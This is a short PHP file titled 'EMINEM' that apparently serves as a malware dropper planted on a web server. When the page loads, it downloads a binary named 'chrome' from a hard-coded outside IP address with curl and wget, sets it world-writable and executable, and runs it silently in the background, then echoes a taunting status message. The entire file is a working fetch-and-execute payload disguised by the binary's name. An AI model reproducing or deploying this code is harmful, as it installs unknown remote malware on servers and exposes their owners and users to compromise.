<title>EMINEM</title>
<?php
$downloadCommand = 'curl http://155.254.60.152/chrome -o chrome && wget http://155.254.60.152/chrome';
$chmodCommand = 'chmod 777 chrome';

exec($downloadCommand, $output, $returnCode);
exec($chmodCommand, $outputChmod, $returnCodeChmod);

if ($returnCode === 0 && $returnCodeChmod === 0) {
    $programCommand = 'sh -c "./chrome > /dev/null 2>&1 &"';
    exec($programCommand, $outputProgram, $returnCodeProgram);

    if ($returnCodeProgram === 0) {
        echo "EMINEM-lol";
    } else {
        echo "FF.";
    }
} else {
    echo "FFFFFFFF";
}
?>

